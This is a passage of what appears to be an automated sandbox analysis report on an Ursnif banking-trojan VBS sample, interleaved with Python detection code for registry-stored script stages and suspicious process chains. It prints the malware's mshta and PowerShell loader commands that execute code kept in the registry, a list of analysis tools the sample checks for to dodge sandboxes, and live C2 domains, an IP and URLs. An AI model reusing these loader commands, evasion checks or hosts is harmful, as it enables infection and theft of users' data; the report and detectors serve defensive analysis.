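    (A real export is UTF-16LE with a BOM; decode it to str before calling this.)"""
    result: Dict[str, Dict[str, Tuple[str, object]]] = {}
    key = None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        km = KEY_RE.match(line)
        if km:
            key = km.group("key")
            result[key] = {}
            continue
        vm = VAL_RE.match(line)
        if not vm or key is None:
            continue
        name, data = vm.group("name"), vm.group("data")
        while data.endswith("\\") and i < len(lines):      # hex continuation line
            data = data[:-1] + lines[i].strip()
            i += 1
        if data.lower().startswith("hex:"):
            result[key][name] = ("REG_BINARY", bytes.fromhex(data[4:].replace(",", "")))
        elif data.startswith('"') and data.endswith('"'):
            result[key][name] = ("REG_SZ", data[1:-1].replace('\\\\', '\\').replace('\\"', '"'))
        else:
            result[key][name] = ("OTHER", data)
    return result


def decode_stage(value: Tuple[str, object]):
    """What `[Text.Encoding]::ASCII.GetString((gp key).Name)` would yield: the text if the
    blob is printable ASCII, else None (timestamps, config blobs, encrypted stages)."""
    kind, data = value
    if kind == "REG_SZ":
        return data
    if kind != "REG_BINARY":
        return None
    text = data.decode("ascii", errors="replace")
    return text if all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text) else None


def hunt(text: str) -> List[Tuple[str, str, str, str]]:
    """(key, value name, verdict, preview) for every value under a GUID storage key."""
    findings = []
    for key, values in parse_reg(text).items():
        if not TARGET_RE.search(key):
            continue
        for name, value in values.items():
            stage = decode_stage(value)
            if stage is None:
                raw = value[1]
                preview = raw.hex() if isinstance(raw, bytes) else str(raw)
                findings.append((key, name, "binary, not printable", preview))
                continue
            markers = [m for m in SCRIPT_MARKERS if m in stage.lower()]
            verdict = "script: " + ", ".join(markers) if markers else "printable, no script markers"
            findings.append((key, name, verdict, stage[:60]))
    return findings


if __name__ == "__main__":
    for key, name, verdict, preview in hunt(SAMPLE_REG):
        print(f"{name:12} {verdict:32} {preview}")
```

The value names (UtilDate, UtilTool, DeviceFile) are per-sample; the durable indicator is the GUID-named key under AppDataLow\Software\Microsoft holding REG_BINARY values that decode to script, which is why the pattern match is on the key path rather than on the names.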
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (78 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (13 occurrences)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.563925033.000002CC0FD13000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: C:\Windows\System32\wscript.exe TID: 1932 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2433
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3388
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 736E1580
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
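Added detection example (not part of this report): the process-creation chain listed above (WmiPrvSE.exe launching rundll32 on a .cpp file, mshta.exe started with an inline `about:<hta:application>` document, that mshta spawning powershell.exe which IEXes a registry value, and powershell compiling C# out of %TEMP% with csc.exe) expressed as rules over process-creation events with parent linkage, of the kind Sysmon event 1 or an EDR provides. The events below are constructed to mirror the chain in this report (the PIDs are invented) plus one benign rundll32 launch as a control; nothing here is the sandbox's own signature logic.

```python
"""Process-chain rules for the mshta -> powershell -> csc and WMI -> rundll32 chain in this report.
Events are constructed (pids invented); the command lines are modelled on the ones the report lists."""
import re
from typing import Dict, List, Tuple

EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\Desktop\start[526268].vbs"'},
    {"pid": 110, "ppid": 4, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"},
    {"pid": 120, "ppid": 110, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer"},
    {"pid": 130, "ppid": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": '"C:\\Windows\\System32\\mshta.exe" "about:<hta:application><script>...</script>"'},
    {"pid": 140, "ppid": 130, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp "
                "'HKCU:Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"},
    {"pid": 150, "ppid": 140, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r"csc.exe /noconfig /fullpaths @C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline"},
    # benign control: rundll32 from the shell loading a real DLL by its documented export
    {"pid": 160, "ppid": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

DLL_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
RUNDLL_MOD_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+)"?\s*,', re.I)
INLINE_HTA_RE = re.compile(r"about:\s*<hta:application", re.I)
IEX_RE = re.compile(r"\biex\b|invoke-expression", re.I)
REG_READ_RE = re.compile(r"\b(?:gp|Get-ItemProperty)\b[^;]*HKCU:", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every event that matches a chain rule."""
    by_pid = {e["pid"]: e for e in events}
    hits: List[Tuple[str, int]] = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        if img == "mshta.exe" and INLINE_HTA_RE.search(cmd):
            hits.append(("mshta inline HTA payload", e["pid"]))
        if img == "powershell.exe" and pimg == "mshta.exe":
            hits.append(("mshta spawned powershell", e["pid"]))
        if img == "powershell.exe" and IEX_RE.search(cmd) and REG_READ_RE.search(cmd):
            hits.append(("powershell IEX of registry-stored payload", e["pid"]))
        if img == "csc.exe" and pimg == "powershell.exe" and TEMP_RE.search(cmd):
            hits.append(("powershell compiling C# from Temp", e["pid"]))
        if img == "rundll32.exe":
            m = RUNDLL_MOD_RE.search(cmd)
            mod = m.group(1).strip() if m else ""
            name = basename(mod)
            ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
            if mod and ext not in DLL_EXTS:
                hits.append(("rundll32 loading non-DLL extension", e["pid"]))
            if pimg == "wmiprvse.exe":
                hits.append(("rundll32 spawned via WMI (WmiPrvSE)", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in check(EVENTS):
        print(f"pid {pid}: {rule}")
```

The rules are deliberately independent: the WMI-parent rule fires even when the loader is renamed to .dll, and the non-DLL-extension rule fires even when the parent is a regular shell, so a change to one evasion detail does not silence the whole chain. PowerShell's parent being mshta is the same relationship the two Sigma rules in the overview ("MSHTA Spawning Windows Shell") encode.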
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01206CD6 cpuid 34_2_01206CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_0120682B HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,34_2_0120682B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01205A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,34_2_01205A5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01206CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,34_2_01206CD6
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match | File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif (the matched memory dumps and unpacked PE files are the same as those listed under Stealing of Sensitive Information above)

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 221 | Path Interception | Process Injection 511 | Disable or Modify Tools 1 | Credential API Hooking 3 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
Default Accounts | Scripting 121 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting 121 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Email Collection 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Credential API Hooking 3 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter 1 | Logon Script (Mac) | Logon Script (Mac) | File Deletion 1 | NTDS | System Information Discovery 46 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | PowerShell 1 | Network Logon Script | Network Logon Script | Rootkit 4 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 11 | Cached Domain Credentials | Security Software Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Modify Registry 1 | DCSync | Virtualization/Sandbox Evasion 41 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 41 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 511 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

Behavior Graph

Behavior Graph ID: 480986 | Sample: start[526268].vbs | Start date: 10/09/2021 | Architecture: WINDOWS | Score: 100

[Behavior graph image; the node and edge labels recovered from it are shown as a process tree]

Sample start[526268].vbs
  • DNS/IP: art.microsoftsofymicrosoftsoft.at, resolver1.opendns.com
  • Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 12 other signatures
  • started mshta.exe
      • Signature: Suspicious powershell command line found
      • started powershell.exe
          • dropped: C:\Users\user\AppData\Local\...\hvjfk3yo.0.cs (UTF-8); C:\Users\user\AppData\...\1cv1ijms.cmdline (UTF-8)
          • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Compiles code for process injection (via .Net compiler); Creates a thread in another existing process (thread injection)
          • started csc.exe
              • dropped: C:\Users\user\AppData\Local\...\1cv1ijms.dll (PE32)
              • started cvtres.exe
          • started conhost.exe
  • started wscript.exe
      • dropped: C:\Users\user\AppData\Local\Temp\fum.cpp (PE32)
      • Signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Deletes itself after installation; Creates processes via WMI
  • started WmiPrvSE.exe
      • started rundll32.exe
          • started rundll32.exe
              • DNS/IP: atl.bigbigpoppa.com 185.251.90.253, ports 49790, 49791, 49792, SPRINTHOSTRU, Russian Federation
              • Signatures: System process connects to network (likely due to code injection or exploit); Writes registry values via WMI
  • 2 other processes started

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
34.2.rundll32.exe.1200000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

Source | Detection | Scanner
art.microsoftsofymicrosoftsoft.at | 4% | Virustotal
atl.bigbigpoppa.com | 9% | Virustotal

                      URLs

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://art.microsoftsofymicrosoftsoft.at/fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r | 0% | Avira URL Cloud | safe
http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu | 100% | Avira URL Cloud | malware
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
resolver1.opendns.com | 208.67.222.222 | true | false | | high
art.microsoftsofymicrosoftsoft.at | 185.251.90.253 | true | true | | unknown
atl.bigbigpoppa.com | 185.251.90.253 | true | true | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
